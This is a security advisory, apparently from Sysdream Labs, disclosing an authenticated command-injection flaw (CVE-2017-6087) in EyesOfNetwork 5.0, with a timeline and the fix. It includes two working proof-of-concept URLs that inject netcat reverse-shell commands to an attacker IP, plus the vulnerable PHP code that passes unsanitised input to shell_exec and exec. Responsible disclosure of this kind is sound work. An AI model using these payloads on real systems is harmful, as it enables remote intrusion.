# [CVE-2017-6087] EON 5.0 Remote Code Execution

## Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

## Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing
authenticated users to execute arbitrary code.

**CVE ID**: CVE-2017-6087

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-78

**CVSS Base Score**: 7.6

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L


### Proof of Concept 1

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `selected_events` parameter is not correctly filtered before it is
used by the `shell_exec()` function.

There, it is possible to inject a payload like in the request below,
where we connect back to our handler:

```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```

#### Vulnerable code

The payload gets injected into the `$event[$key]` and `$ged_command`
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:

```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
  if($value["type"] == true){
    if($key == "owner"){
      $event[$key] = $owner;
    }
    $ged_command .= "\"".$event[$key]."\" ";
  }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```

Two other functions in this file are also affected by this problem:

* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`


### Proof of Concept 2

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `module` parameter is not correctly filtered before it is used by
the `shell_exec()` function.

Again, we inject our connecting back payload:

```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```

#### Vulnerable code

In the `module/index.php` file, line 24, we can see that our payload is
injected into the `exec()` function without any sanitization:

```
# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {

	$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");

	# Redirect to module page if rpm installed
	if($module!=0) { header('Location: '.$_GET["link"].''); }

}
```


## Timeline (dd/mm/yyyy)

* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

## Solution

Update to version 5.1

## Affected versions

* Version <= 5.0

## Credits

* Nicolas SERRA <n.serra@sysdream.com>

-- SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/ *
Twitter: @sysdream